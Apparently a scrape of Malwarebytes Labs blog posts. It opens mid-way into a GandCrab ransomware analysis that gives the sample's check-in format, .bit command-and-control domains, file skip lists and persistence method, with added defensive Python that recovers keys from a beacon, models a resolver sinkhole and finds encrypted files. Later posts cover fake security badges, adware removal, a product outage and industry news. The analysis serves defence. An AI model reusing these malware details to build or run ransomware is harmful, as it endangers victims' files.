action=call&ip= 7 Enterprise&os_bit=x64&ransom_id=c9ed65de824663fc&hdd=C:FIXED_64317550592/50065174528&pub_key=BgIAAACkAABSU0ExAAgAAAEAAQCn7L3iSUPhEdoSEOAlWaqDdzX8PknIO2w9kc//lm7YRf6KWCDmy5GrmWriBOxYZpUFjC9+xhltJLVfxJoBPTv7MU6sJQeMDmxXTMAjJDrrV5cXefhic2utsglgu7eaz/lbaLjBRAf1Xj4G/sI1z5mCKSg3G+ZRKWwLh4n5kCb3zNp1xEah4zAJwGrLXsuHjkDvTH4CrugGatck/A5A6mnNbY0kkm5TL9Jp0qLzl1Rj69nHvZ5BGZHxa9bKrZ4O0wugU1CEh21JTEnSO46A93818dengQ+QBECsS3ztN3GKsfqEMzP7Yu4Eo8eaRyxkZJU9NKXMEm7kgUDmfwMCxFfW &priv_key=[base64 private key omitted] &version=1.0

[Crypto key base64 functions]

[Section of code that adds the encoded keys to the GET string under the priv_key parameter]

At this point, it is clear that the malware will be sending this info to the C2 server. This is interesting because it may be possible to pull the keys from memory and use them for the decryption of files. We will continue to investigate this and update the article if any discoveries are found.
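The check-in string above leaks more than system information: both key blobs ride in it, base64-encoded and otherwise unprotected, so a network capture of the beacon is a recovery path. The Python below is an added example (not GandCrab’s code) that decodes the CryptoAPI PUBLICKEYBLOB header from the first 28 characters of the pub_key value shown above, rebuilds a beacon from constructed system-info values and a constructed key pair, and extracts the keys back out of a captured query. The field names other than those visible in the capture are assumptions.

```python
import base64
import struct
from urllib.parse import parse_qs


def parse_publickeyblob(blob):
    """Decode the CryptoAPI key blob layout: BLOBHEADER (8 bytes) + RSAPUBKEY
    (12 bytes) + modulus. CryptExportKey emits this; the beacon carries it base64-encoded."""
    btype, bver, _reserved, alg = struct.unpack_from("<BBHI", blob, 0)
    magic, bitlen, pubexp = struct.unpack_from("<4sII", blob, 8)
    return {"type": btype,              # 6 = PUBLICKEYBLOB, 7 = PRIVATEKEYBLOB
            "version": bver,
            "alg": alg,                  # 0xA400 = CALG_RSA_KEYX
            "magic": magic.decode(),     # "RSA1" public, "RSA2" private
            "bitlen": bitlen,
            "pubexp": pubexp,
            "modulus_bytes": len(blob) - 20}


# First 28 base64 characters of the pub_key value in the capture above:
# the 20-byte header plus the first modulus byte.
PAGE_PUBKEY_PREFIX = "BgIAAACkAABSU0ExAAgAAAEAAQCn"


def page_pubkey_header():
    return parse_publickeyblob(base64.b64decode(PAGE_PUBKEY_PREFIX))


def fake_key_blob(magic):
    """Constructed key blob with a valid header and a dummy 2048-bit modulus."""
    btype = 6 if magic == b"RSA1" else 7
    return (struct.pack("<BBHI", btype, 2, 0, 0xA400) + magic
            + struct.pack("<II", 2048, 65537) + bytes(range(256)))


def build_checkin(info, pub_blob, priv_blob, version="1.0"):
    """Assemble the check-in query in the field order of the capture. Values are
    left unencoded, as in the capture, where spaces and '/' appear literally."""
    fields = [("action", "call")] + list(info.items()) + [
        ("pub_key", base64.b64encode(pub_blob).decode()),
        ("priv_key", base64.b64encode(priv_blob).decode()),
        ("version", version)]
    return "&".join(f"{k}={v}" for k, v in fields)


def split_query(query):
    """Split on '&' and on the first '=' only; no percent or plus decoding."""
    return dict(part.split("=", 1) for part in query.split("&") if "=" in part)


def extract_keys(query):
    """Recover both key blobs from a captured beacon."""
    fields = split_query(query)
    return {"ransom_id": fields.get("ransom_id"),
            "pub_key": base64.b64decode(fields["pub_key"]),
            "priv_key": base64.b64decode(fields["priv_key"])}


def naive_parse_corrupts(query):
    """True when parse_qs mangles priv_key: it decodes '+' as a space, so a
    base64 value containing '+' comes back different."""
    return parse_qs(query)["priv_key"][0] != split_query(query)["priv_key"]


def is_gandcrab_checkin(query):
    """Cheap predicate for a proxy or IDS log line."""
    markers = ("action=call", "&ransom_id=", "&pub_key=", "&priv_key=", "&version=")
    return all(m in query for m in markers)


# Constructed system-info fields; only ransom_id, os_bit and hdd come from the capture.
SAMPLE_INFO = {"ip": "198.51.100.7", "pc_user": "analyst", "os_bit": "x64",
               "ransom_id": "c9ed65de824663fc", "hdd": "C:FIXED_64317550592/50065174528"}

if __name__ == "__main__":
    print(page_pubkey_header())
    q = build_checkin(SAMPLE_INFO, fake_key_blob(b"RSA1"), fake_key_blob(b"RSA2"))
    print(is_gandcrab_checkin(q), naive_parse_corrupts(q))
    print(parse_publickeyblob(extract_keys(q)["priv_key"]))
```

Splitting the query by hand matters: base64 uses ‘+’, and a generic query-string parser decodes ‘+’ as a space, which silently corrupts the recovered key. The header decode of the captured prefix confirms a 2048-bit RSA key with public exponent 65537 and algorithm CALG_RSA_KEYX.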

GandCrab’s server is hosted on a .bit domain, and therefore it has to query a name server that supports this TLD. It does this by querying for the addresses of the following domains using the command:

nslookup [insert domain]

This command queries name servers that support the .bit TLD for one of the domains below.

bleepingcomputer.bit nomoreransom.bit esetnod32.bit emsisoft.bit gandcrab.bit

The nslookup child process is launched with its standard output connected to a pipe the parent created, so the parent reads the resolved address directly from the pipe rather than passing output back and forth through a file or the console. It is a simple and effective technique. You can look at the following section of code for more details:

The ransomware now attempts to send data to the server, and if an error occurs or the server was not reachable, it continues this whole process in an infinite loop until it finds one that works, re-querying for client IP and running nslookup again and again with different IP outputs. Unless it connects with the server, it will run until it is closed manually.

As mentioned before, it will not continue to the encryption routine until it finds a server, which means it will enter in an infinite loop of IP requests:
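Because encryption never starts until one of these names resolves, the lookup is also the cheapest place to stop the sample. The Python below is an added model (not GandCrab’s code) of that gate: a parser for nslookup’s output that ignores the resolver’s own address line, a check for the Namecoin .bit TLD, and the retry loop with an injectable resolver. The transcripts are constructed, and the attempt cap is added so the model terminates, unlike the sample.

```python
import re

# Domains queried by the sample, in the order listed above.
C2_DOMAINS = ["bleepingcomputer.bit", "nomoreransom.bit", "esetnod32.bit",
              "emsisoft.bit", "gandcrab.bit"]

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"


def parse_nslookup(output):
    """Answer addresses from Windows nslookup output. The first 'Address:' line
    belongs to the resolver itself and must be skipped; a lookup failure yields []."""
    answers, seen_name = [], False
    for line in output.splitlines():
        line = line.strip()
        if line.startswith("Name:"):
            seen_name = True
        elif seen_name and line.startswith(("Address:", "Addresses:")):
            answers += re.findall(IPV4, line)
        elif seen_name and re.fullmatch(IPV4, line):
            answers.append(line)     # continuation lines of a multi-address answer
    return answers


def is_blockchain_domain(name):
    """'.bit' is the Namecoin TLD: no ICANN resolver serves it, so a lookup for
    one is worth alerting on in DNS telemetry."""
    return name.lower().rstrip(".").endswith(".bit")


def resolve_c2(domains, run_nslookup, max_attempts):
    """Model of the gating loop: cycle through the domains until one resolves.
    The sample itself never gives up; max_attempts is added so the model terminates.
    Returns (domain, ip, attempts) or None when nothing resolved."""
    attempts = 0
    while attempts < max_attempts:
        for domain in domains:
            attempts += 1
            ips = parse_nslookup(run_nslookup(domain))
            if ips:
                return domain, ips[0], attempts
            if attempts >= max_attempts:
                break
    return None


# Constructed nslookup transcripts (not real captures).
NXDOMAIN = ("Server:  UnKnown\nAddress:  203.0.113.53\n\n"
            "*** UnKnown can't find {d}: Non-existent domain\n")
ANSWER = ("Server:  UnKnown\nAddress:  203.0.113.53\n\n"
          "Non-authoritative answer:\nName:    {d}\nAddress:  198.51.100.77\n")


def fake_resolver(known):
    """Stand-in for the nslookup child process: answers only for names in `known`."""
    return lambda d: (ANSWER if d in known else NXDOMAIN).format(d=d)


if __name__ == "__main__":
    print(resolve_c2(C2_DOMAINS, fake_resolver({"gandcrab.bit"}), 20))
    print(resolve_c2(C2_DOMAINS, fake_resolver(set()), 20))   # sinkholed: never encrypts
    print([d for d in C2_DOMAINS if is_blockchain_domain(d)])
```

With a resolver that never answers, resolve_c2 returns None, which in the real sample corresponds to the encryption thread never being started; blocking or sinkholing .bit lookups at the resolver has the same effect.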

Once it finds one, it continues to open a thread that starts the main encryption functionality. Before it begins, however, it opens another thread that creates a window labelled Firefox. The window is loaded with code that copies the malware to the temp directory and sets it up in the registry. This is one of the few parts of the malware whose strings are not in plain text. The file name of the copy is a random series of letters generated by calling CryptGenRandom and using its output to index an array of letters.

The strange part about this function is not what it does, because it is creating the persistence we had been waiting for, but rather why a window was created in the first place. As far as we could tell, there is no benefit to launching a window to perform these tasks. Maybe it was an experiment on the part of the author, but the intent remains unclear.

Encryption routine

As we established in the initialization section of the malware, the encryption algorithm used is RSA. Before we get to the encryption section, the code makes sure that it is not encrypting specific types of files that it considers protected. The files are the following, hard-coded into the malware:

  • desktop.ini
  • autorun.inf
  • ntuser.dat
  • iconcache.db
  • bootsect.bak
  • boot.ini
  • ntuser.dat
  • thumbs.db
  • GDCB-DECRYPT.txt
  • .sql

If it finds that the file name is on that list, it will skip it and continue to the next. It also skips looking into a folder if it is one of these key folders:

  • local app data
  • windows
  • programfiles
  • program data
  • ransomware
  • localsettings

When it passes these checks and gets to a specific file, it runs one final check on the extension against a list of acceptable file extensions to be encrypted:

If all checks pass, it proceeds to use the previously generated keys, along with some salt and a generated random number, to encrypt the file and rename it with a .GDCB extension. The main encryption loop is a recursive function that will eventually reach every file on the drive.
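For incident scoping, an added example (not the authors' code) that walks a directory tree for the two artefacts described above, files renamed with the .GDCB extension and GDCB-DECRYPT.txt notes, and reports them per directory. The victim-like tree is constructed in a temporary directory.

```python
"""Scope a suspected GandCrab infection by its file-system footprint.

Added example, not from the Malwarebytes write-up. It looks for the two
artefacts the analysis describes, files renamed with a .GDCB extension and
GDCB-DECRYPT.txt notes, and groups them by directory so a responder can see
how far the recursive encryption loop got. The victim tree is constructed.
"""
import os
import tempfile
from collections import defaultdict

ENCRYPTED_EXT = ".gdcb"           # extension appended to encrypted files
RANSOM_NOTE = "gdcb-decrypt.txt"  # note name, also on the malware's own skip list


def triage_gdcb(root):
    """Walk root and return counts of .GDCB files per directory plus note paths."""
    by_dir = defaultdict(int)
    notes = []
    total = 0
    for dirpath, _dirs, files in os.walk(root):
        rel = os.path.relpath(dirpath, root)
        for name in files:
            lower = name.lower()
            if lower == RANSOM_NOTE:
                notes.append(os.path.join(rel, name))
            elif lower.endswith(ENCRYPTED_EXT):
                by_dir[rel] += 1
                total += 1
    return {
        "total_encrypted": total,
        "by_dir": dict(by_dir),
        "notes": sorted(notes),
        # A note in a directory with no encrypted file deserves a second look.
        "notes_without_encrypted": sorted(
            os.path.dirname(n) for n in notes if os.path.dirname(n) not in by_dir
        ),
    }


def build_sample_tree():
    """Constructed tree: encrypted documents, notes, and files the write-up says are skipped."""
    root = tempfile.mkdtemp(prefix="gdcb_triage_")
    layout = {
        os.path.join("Users", "victim", "Documents"):
            ["report.docx.GDCB", "budget.xlsx.GDCB", "GDCB-DECRYPT.txt"],
        os.path.join("Users", "victim", "Documents", "Archive"):
            ["old.pdf.GDCB", "GDCB-DECRYPT.txt"],
        "Windows": ["notepad.exe"],   # skipped folder name: nothing encrypted here
        ".": ["desktop.ini"],         # protected file name: left untouched
    }
    for rel, names in layout.items():
        directory = os.path.join(root, rel)
        os.makedirs(directory, exist_ok=True)
        for name in names:
            with open(os.path.join(directory, name), "wb") as fh:
                fh.write(b"constructed sample content")
    return root


if __name__ == "__main__":
    report = triage_gdcb(build_sample_tree())
    print(f"encrypted files: {report['total_encrypted']}")
    for directory, count in sorted(report["by_dir"].items()):
        print(f"  {directory}: {count}")
    print("ransom notes:", *report["notes"], sep="\n  ")
```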


Malwarebytes users are protected at the delivery chain (exploit protection), but we also proactively stopped this ransomware before having seen it, thanks to our anti-ransomware engine:


It is interesting to see a new ransomware being distributed via exploit kits in what so far seems to be a few ongoing campaigns. The other interesting aspect is that two distinct exploit kits are delivering it, although it is unclear if the same actor is behind both campaigns and experimenting with different distribution channels.

Indicators of Compromise

Seamless gate: xn--80abmi5aecft.xn--p1acf

GrandSoft EK (IP)

GandCrab (packed)


GandCrab (unpacked)


The post GandCrab ransomware distributed by RIG and GrandSoft exploit kits appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Stolen security logos used to falsely endorse PUPs

Malwarebytes - Tue, 01/30/2018 - 16:35

To gain the trust of users, many websites and companies feature the logos of reputable firms who endorse their products. Unfortunately, some unseemly companies do the same, using logos of companies who have not, in fact, endorsed their product in order to trick people into thinking that what they are about to install is legitimate. Potentially Unwanted Programs (PUPs) are masters in this trade of building false trust.

The most popular logos used by criminals to achieve this false trustworthiness are:

  • McAfee SECURE
  • Norton Secured Seal
  • Microsoft Partner Network/Microsoft Technologies

Below is an example of a website that has all three of them, so it must be the safest site imaginable. (Wrong.)

In fact, it is a fake online scanner that will try to scare you into thinking that your computer is infected with some nasty viruses and that their solution can take care of it. Actually, they will try to sell you a PUP like Master PC Cleaner that will inform you about even more problems with your system. To compound matters, they’ll then offer to help you get rid of them—for a price. Should you need assistance, many of these so-called “system optimizers” are not afraid to get involved in tech support scams either. Their support numbers are displayed prominently in their GUI.

So how do programs that can scam people out of money in three different ways get these badges of authentication on their sites? Likely, they are used without authorization. In fact, it is no harder than copying one of these logos from a Google image search and inserting the image onto the site.

What do these logos actually mean?

First of all, if the logos are used without authorization, they mean nothing. Nada. Niente. Putting a picture on a website does not change the way the site or product it offers behaves.

But even if the logos are real and authorized, they may not mean what you think they mean. To help suss out whether a site is trustworthy or not, it’s not a bad idea to learn what these logos actually stand for.


The McAfee SECURE logo is free for websites with up to 500 visitors per month. If you find the real logo on a site, it will be visible as a small “M” in the bottom right-hand corner. You can expand that logo to read about what it means.

In a nutshell, a McAfee SECURE logo indicates the following:

  • There is no malware hosted or linked to on the site.
  • The site has a valid SSL certificate, which means traffic to and from is encrypted.
  • There is no phishing detected.

Which is all well and good. It means the website has been checked for all these points, but it doesn’t mean that the product advertised on the site is endorsed by McAfee. And if you see the logo displayed without an option to see the number of reviews, chances are high that the site owner just pasted that image on their site and didn’t actually earn it, as was the case for our fake online scanner.

Norton Secured Seal

The Norton Secured Seal is included at no cost with all Symantec certificates. If installed on a website not using a Symantec certificate, the seal will not display. Please note that this doesn’t mean it will stop someone from using an unauthorized image on their site. But again, even if the seal is real, it doesn’t mean the product advertised on the site is secure. It just tells us the site has a Symantec SSL certificate.

Microsoft Partner Network

The Microsoft Partner Network (MPN) is designed to help qualified technology companies build, sell, provide, service, and support solutions for their customers with Microsoft technologies. To qualify for the MPN, a technology company must sell or provide more than 75 percent of its IT solutions and services, or derive 75 percent or more of its total revenue through the external monetization of their intellectual property solution(s) to unaffiliated third parties. Nothing in the MPN agreement restricts a company from working with and using non‑Microsoft technologies.

Basically, companies pay a fee for which they get Microsoft tools, training, and software in return—and the right to display a Microsoft partner logo on their product and site. The only “check” that Microsoft performs for the exchange of their tools and logo (that I could find) is to verify that partners derive 75 percent of their business from third parties (non-affiliates). That could be anyone. And it doesn’t guarantee the safety of the products sold on the site.

How can I check the authenticity of the logo?

If you see a McAfee SECURE or Norton Secured Seal on a website, you can check to see if they are real by clicking on the logo. The real logos are clickable and include additional information about their meaning. Fake McAfee and Norton logos will not be clickable or might include incomplete information.

The Microsoft Partner Network is searchable, but unfortunately knowing the name of the product alone is not always enough to find out if that company is a legitimate partner. And the name of the product is not necessarily the same as the name of the company.


As we have learned, it is easy for websites to abuse logos of trust, using them to fake the appearance of an endorsement of a product or site. It’s also easy to confuse those logos, even when used legitimately, for a blanket statement on the security of the product or site. And since most fraudulent companies change names and sites almost as often as their socks, they don’t care if someone finds out.

That means the best thing you can do to guarantee a safe online purchase or surfing experience is to never assume that a logo automatically makes a site legitimate. Put on your cynical caps, take a closer look, and remember that if it seems too good to be true, it probably is.

Be careful out there!


A week in security (January 22 – January 28)

Malwarebytes - Mon, 01/29/2018 - 19:00

Last week on Labs, we analyzed a rogue app outbreak on Twitter, took a look at how Singapore’s government is faring with network defense, and rolled out our 2017 State of Malware report. We also became visionaries in Gartner’s Magic Quadrant report and explored a VR data mishap.

Other news

Finally, a tip of the hat and a shout out to the very awesome Hasherezade, who’s been included on a Forbes Europe list of 30 under 30—a fantastic achievement!

Stay safe, everyone!


How to remove adware from your PC

Malwarebytes - Mon, 01/29/2018 - 17:54

“Close. Close. Close. Close,” my mother mumbles as she aggressively clicks her mouse over and over.

“What’s wrong, Ma?” I’m home for the holidays, and cozy, cold evenings are often spent in front of the fireplace. This night, however, my mom is stuck at her computer.

“This stupid thing won’t stop showing me ads.”

“Looks like a job for Malwarebytes!” I joke, but come over to examine. Her screen is loaded with advertisements. Upon closing one, another pops up.

So many pop-ups, so little time.

Looks like mom’s got adware.

What is adware?

Adware is short for advertising-supported software. It’s well-known for being a major Mac nuisance and has made itself ubiquitous on Android OSes, finding its way into the Google Play Store as Trojanized apps.

But adware is a PC problem, too. It delivers ads and other browser-cluttering junk most often in the form of pop-ups, tabs, and toolbars. Beyond simply bombarding you with ads, adware can hijack your browser, redirecting you to sites you weren’t planning on visiting (and showing you ads there) or delivering random, back-alley search engines results. It can slow down your computer and is often frustratingly difficult to remove.

Have some toolbars, courtesy of Mindspark adware.

Why would anyone knowingly install a program that behaves this way? The answer is: They wouldn’t. When legitimate software applications use online advertising, the ads are typically bundled within the program and designed and displayed in ways that the developer specified—and a good developer knows not to piss off customers with overbearing ads. Adware, in contrast, is specifically designed to be a nuisance, sneaking its way onto people’s systems by bundling up with legit programs or disguising itself as something else.

Whether you download adware without full knowledge of what you’re getting or whether it hides in the EULA of another software program like a stowaway, it’s behaving in a way that neither you nor the software it latches onto wants. This is what makes adware a type of potentially unwanted program, or PUP.

How is adware different from PUPs?

Adware is, essentially, a type of potentially unwanted program. PUPs also include other borderline malicious programs, such as spyware, browser lockers, dialers, and junkware. Security companies flag these programs as “potentially” unwanted, but the reality is, any sane person would not want this crap on their computer. Unfortunately, since most people aren’t paying close attention to what they download, they essentially agree to install the programs without realizing it.

Even more unfortunately, any attempts by security companies to fully block these programs as malware can get legally hairy. Thankfully, the cybersecurity industry is making strides in courtroom battles and in public opinion against software providers whose programs cross the line from slight bother to major asspain.

How do you get adware?

The most common ways for adware to infect PCs today are through toolbars/browser extensions, bundled software, and downloads offered by pop-ups.

A Trojan containing adware may pretend to be something you want, such as a plug-in or video player, but what you really end up downloading is an adware installer. Adware may also hide inside a legitimate download from an unethical site. Often, it shows up in downloaded files from torrents or piracy sites. It’s even making its way into the Google Play Store—with more frequency these days—and blessing Android devices with its garbage content.

The common theme among these delivery methods is deception. Adware makers trick users into willfully downloading programs they won’t like by pre-populating check boxes, greying out or minimizing options to skip, or plastering “recommended” next to a preferred option one-too-many times. Half the battle in avoiding adware intrusion on your device is reading install wizards and EULAs with hawk-eyed precision.

A pre-checked box and a tiny EULA screen spells adware

But let’s be real. No one does that.

That means you need a way out when you rush through an install agreement to download the free version of Bejeweled only to be dazzled by a flurry of ads all but ruining your screentime.

How to remove adware

Your way out is relatively simple. If you think you’ve got an adware problem on your PC, you can manually remove it in a few easy steps.

1. Back up your files. Always a good first precaution when you’re faced with a potential infection. Grab an external hard drive or save your most important data to the cloud.

2. Download or update necessary tools. To get your computer sparkly clean, you’ll need to download or run updates to a scanner that specializes in removing adware and PUPs (such as Adwcleaner or the free version of Malwarebytes). If you suspect your computer is heavily infected and you don’t have these tools, you’ll want to install them on a friend’s machine and transfer them to yours via CD or USB.

3. Uninstall unnecessary programs. Before scanning with a security product, check to see if the adware program has an uninstaller. To do this, go to the Add/Remove Programs list in the Windows Control Panel. If the unwanted program is there, highlight it and select the Remove button. After removing the adware, reboot the computer, even if you’re not prompted to do so.

4. Run a scan with an adware and PUPs removal program. Once the program has scanned and found adware, it will likely quarantine the stuff so you can take a look and decide whether or not to delete it. Our recommendation is delete, delete, delete. This will get rid of adware and any other residual files that could bring the adware back.

Read: How to remove adware from Macs

How to avoid adware infection

While the above steps can rid PCs of most adware, there are a few belligerent forms that are difficult to remove—and these more aggressive adware programs are popping up more and more (pun intended). The makers of adware today have adapted their techniques in order to skirt around more comprehensive ad-blocking tools introduced by major browser developers, including Google, Mozilla, and Microsoft. Their formerly grey tactics have turned to black.

The bad guys bundle their adware and PUPs programs with tools that act as protection against their removal by blocking security software from running or even being installed, or by stopping users from taking measures to remove the adware themselves. The only known way to protect against these attacks right now is to prevent them from happening in the first place. Thankfully, you can do just that with an adware- and malware-blocking security solution like Malwarebytes.


IMPORTANT: Web Blocking / RAM Usage

Malwarebytes - Sat, 01/27/2018 - 19:53

Earlier this morning, we published a protection update that caused connection issues for many of our customers. As a side effect of the web protection blocks, the product also spiked memory usage and possibly caused a crash.

We have triaged this issue and pushed a protection update that resolves it.

For our consumer solutions

Please follow the steps below on how to update to the latest database:

1. Open Malwarebytes
2. Turn OFF web protection: click on “Settings”, then click to turn web protection OFF
3. Under Scan Status (right side), click next to “Updates” to have Malwarebytes download the latest database
4. Restart PC
(Note it may take up to 2 restarts after the update to stabilize the system)

To confirm that you are on the latest database please follow the steps below:

1. Open Malwarebytes
2. Click on Settings
3. Click on the About tab
4. Next to “Update package version” if you see version 1.0.3803 or higher you are on the latest database which addresses the issue.

If the above doesn’t resolve the issue, please reach out to support at

For our business solutions

Please follow the appropriate steps below to update to the latest database:

Malwarebytes Endpoint Security (On-premises)

First step to get the update is to disable the real-time protection. To do this in the Management console:

1. Open up the policy the clients are on and go to the protection tab.
2. From here, disable the ‘enable protection module’ option.
3. Once this is done click OK. When your clients check in they will get this new policy update.
4. Once real-time protection is disabled and your clients can communicate, highlight the endpoints on the client screen and click the update database button at the top.
5. After the update is applied, a reboot of the machine may be required.

Note: If your client cannot resolve internal addressing, the agent will need to be re-installed manually on the machine. The client will not be able to reach out to the server for a policy update and will never be able to turn off real-time protection.

Malwarebytes Endpoint Protection (Cloud)

1. From the Malwarebytes Cloud console, go to the endpoints pane and select all the endpoints.
2. In the action drop-down, choose the ‘check for protection updates’ option to force an update on all endpoints to database update 1.0.3803.

This should fix the problem for the vast majority of Endpoint Protection endpoints.

If endpoints are still affected after applying this, please reboot the machine.

If the remote agent is unable to reach out and get this update, then we must disable the web protection:

1. In the Malwarebytes Cloud console, go to Settings > Policies and open up the policy the clients are on.
2. From here, go to the endpoint protection policy and turn off the “Web Protection” portion of the policy. Then:

a. If the machine is unresponsive, reboot the machine and log in.

b. Once in, right click on the tray icon and start a scan. This will force a database update and fix the issue.

c. Once updated, cancel the scan and reboot the machine.

3. When the computers are all online and updated, please turn back on the web protection again in the Endpoint Policy.

The root cause of the issue was a malformed protection update that the client couldn’t process correctly. We have pushed upwards of 20,000 of these protection updates routinely. We test every single one before it goes out. We pride ourselves on the safety and accuracy of our detection engines and will work to ensure that this does not happen again.

Getting your computer or business back up and running is our utmost priority, as is rebuilding your trust.

If the above doesn’t resolve the issue, please reach out to support at



Plugging a virtual leak: insecure VR app exposes customer data

Malwarebytes - Fri, 01/26/2018 - 22:00

I’ve been giving talks on the possible problems raised by virtual/augmented/mixed reality for a while now, and sure enough, we have what may be one of the first potentially major security issues thrown up by an in-the-wild application. Until a recent fix was applied, users of the pornography app SinVR could have found their subscriber information up for grabs.

Researchers over at Digital Interruption discovered names, email addresses, and device names for anyone with an account alongside those paying for content using PayPal. This information would be great for social engineering, fake SinVR emails, or just plain old blackmail/embarrassment antics should any attacker be so inclined.

They figured this out because while reversing the app, they realised they could make unauthenticated calls to endpoints, thanks to a function which looked as though it allowed SinVR to download a list of all users. Though they would have had to modify the binary to do this via the app, their web API meant it wasn’t necessary thanks to the previously mentioned endpoints.

If we cast our minds back to around the time of the SONY hack, games companies became popular targets, with company hacks, compromised databases, tampered game servers, and all sorts of other shenanigans. At the time, it was clear that many organisations weren’t doing as much as they could on the security front, although you don’t see quite as many game developers being compromised in such fashion these days.

VR, however, is a brave new world, and there are many new companies who may be in a similar place more traditional games firms were in a few years ago. While my primary interest in VR is seeing how in-game features can be affected, especially with the slow rise of VR ad networks, it’s clear that customer data—or just reversing the apps themselves—is also going to be a big deal.

The barrier to entry for VR development is lowering all the time, with reasonably priced “DIY” kits available online which allow anyone to start coding games. How many of those bedroom coders, who will no doubt release many of these projects with a price tag attached, will understand the complexities of securing both their games and their databases?

This is sadly likely to be the first of many such accidental VR data reveals. The only good news for the developer is that responsible individuals were the first to catch wind of this particular error, rather than someone up to no good. Of course, we’re only hoping they were the first. Realistically, we have no way of knowing if someone with mischief in mind has already figured it out.

Talk about a virtual catastrophe.


Gartner recognizes Malwarebytes as a “Visionary” in the Magic Quadrant

Malwarebytes - Fri, 01/26/2018 - 19:14

I’m proud to announce that Gartner has recognized Malwarebytes as a “visionary” in the 2018 Gartner Magic Quadrant for Endpoint Protection Platforms. Malwarebytes was selected for its completeness of vision and ability to execute.

Our goal is to give every user a malware-free experience and empower them to navigate safely across devices at work and at home now and well into the future. With threats increasing in both size and scale, it’s clear that traditional solutions have been insufficient at protecting the endpoint. Enterprises are realizing the need to re-evaluate their approach to defending the endpoint and have come to Malwarebytes because of our demonstrated understanding of the threat landscape and execution toward a vision of a unified solution to manage the entire threat life cycle: protection, detection, and response.

The Gartner EPP MQ report notes that Malwarebytes offers strong protection capabilities at an attractive price point. As proof, organizations are deploying the full portfolio of Malwarebytes endpoint protection and remediation security software widely across their operations. During the past 12 months, Malwarebytes experienced a seven-fold increase of large enterprise customers.

10 years delivering best-in-class protection

Malwarebytes recently celebrated its 10-year anniversary. For over a decade, we’ve built exceptional trust with our customers, from consumer to enterprise. We’ve been asked to solve the toughest problems—to bail out infected endpoints—when all else had failed. And with that visibility and insight over the years, we’ve honed our craft and developed the most comprehensive protection for the endpoint. We call it Multi-Vector Protection (MVP).

The road to MVP began when we realized that no single approach could be effective against the plethora of techniques the attackers would be leveraging. Some would deliver payloads by exploiting vulnerabilities, others would conduct targeted spying campaigns in order to drop the most effective malware. Some got around all security barriers with the click of a malicious email attachment. We had to provide comprehensive protection by defending against those and a variety of other attack vectors. That’s why MVP features seven layers of threat detecting, blocking, and removing technology.

It’s this approach that enabled us to protect our customers against threats, such as the high-profile ransomware attacks that made headlines throughout 2017.

What’s next

Great technology and advanced features are for naught if they aren’t deployed or used properly. So a big focus here at Malwarebytes is to ensure that while we’re developing best-of-breed technologies, we’re also making them easy to use. Part of that includes keeping our customers aware of the latest developments in malware and in our products’ ability to protect against it. So while this is in an exciting moment for us here at Malwarebytes, there’s no resting on our laurels.

Stay tuned to learn more about our latest developments in the fight against cybercrime.


Presenting: Malwarebytes Labs 2017 State of Malware Report

Malwarebytes - Thu, 01/25/2018 - 13:00

2017 was a tumultuous year in politics, media, gender, race—and cybersecurity didn’t beat the rap. Last year was full of twists and turns in the cybercrime world, with major outbreaks, new infection methods, and the evolution of the cryptocurrency crime industry.

In aiming to make sense of the madness, we gathered information from our data science, research, and intel teams throughout the year, checking in on trends, the rise and fall of malware families, distribution methods, and more. What we came up with was a more complete picture of the 2017 threat landscape that showed us just how much can change in a year.

In our 2017 State of Malware report, we examined attack methods, malware developments, and distribution techniques used by cybercriminals over the last 12 months. We dove into the exponential increases of malware volume and severity year-over-year, as well as trends in high-impact threats, such as ransomware and cryptomining. Some of our key takeaways include:

Ransomware volume was up in 2017, but trending downward.

Ransomware detections were up 90 and 93 percent for businesses and consumers respectively in 2017, with several splashy outbreaks accounting for the majority of the increase in rates. However, development of new families and tactics for delivery slowed way down, especially in the last quarter of the year.

What they can’t hold for ransom, criminals will steal instead.

With ransomware slowly going out of favor, criminals pivoted to banking Trojans, spyware, and hijackers in 2017 to attack companies instead. We saw an increase of 40 percent in hijackers and 30 percent in spyware detections in 2017. The second half of the year also marked an average of 102 percent increase in banking Trojan detections.

Cryptomining is out of control.

Alongside a sudden cryptocurrency craze, bad actors have started utilizing cryptomining tools for their own profit, using victim system resources in the process. This includes compromised websites serving drive-by mining code, a significant increase of miners through malicious spam and exploit kit drops, and adware bundlers pushing miners instead of toolbars. By the end of 2017, basically anyone doing any kind of cybercrime was also likely dabbling in cryptomining.

In addition to looking back at 2017, we looked forward to 2018, analyzing current trends and pontificating on what they point to. We realize making predictions about cybercrime is a bit more art than science, but when we look back over years of patterns and data and experience, we can make some educated guesses about where we think this is all going. With that in mind, some of our 2018 predictions include:

A “slow” year for Internet of Things threats means more attacks in 2018.

Attackers spent a lot of time in 2017 developing new tools to take advantage of IoT with spam-spreading botnets and, likely, more DDoS attacks. It’s not farfetched to think we may see DDoS attacks against large organizations, like airline companies and power utilities, demanding a ransom to call off an army of botnet-infected IoT devices. But rather than encrypt files, the attacks will disrupt businesses and their operations until payment has been made.

Cryptocurrency mining fever will give birth to dangerous new threats.

Drive-by mining and skyrocketing values are driving interest in cryptomining from both users and criminals alike—to the point where retailers are now screening potential graphics card customers for miners. Faced with continued volatility, we are likely going to see an evolution of drive-by mining tools, new mining platforms (such as Android and IoT devices), and new forms of malware designed to mine and/or steal cryptocurrency.

To see our complete analysis of key developments in malware, the most interesting attack vectors of the year, predictions for 2018, and more, read:

the 2017 State of Malware report


Singapore government gets into the network defense game

Malwarebytes - Tue, 01/23/2018 - 22:00

There is a common assumption in the infosec community that enormous breaches like those at Equifax, Anthem, and Target are the new norm. That the next mega breach is simply a matter of time. This is because large companies loathe spending money on things that are not directly profitable like secure infrastructure or quality training for employees. Further, there isn’t really any external pressure on corporations to do better—so they won’t.

Some countries have recognized that these sorts of negative externalities cause significant public harm, and have sought to get ahead of the threat curve with cybersecurity legislation. Singapore currently has a comprehensive cybersecurity bill under consideration that is trying very hard to bring a bit of order to the wild west of technology threats. The bill is exhaustive in covering management of cyberthreats, so let’s look at what it does well and what it does not do well.

The good
  • Appoints a national CISO. US cyberdefenses frequently suffer from an unclear chain of command, as well as competing agency priorities. The buck needs to stop somewhere to mount an effective defense.
  • Designates critical infrastructure. You cannot prioritize defenses for systems you aren’t looking at.
  • Duty to report. This is a big one. Often fearful of liability, stock impact, or impact to reputation, corporations will often sit on cyberattack disclosure for months—sometimes until an executive can sell his company’s stock. Removing any ambiguity on when and how to report breaches gets everyone on the same page.
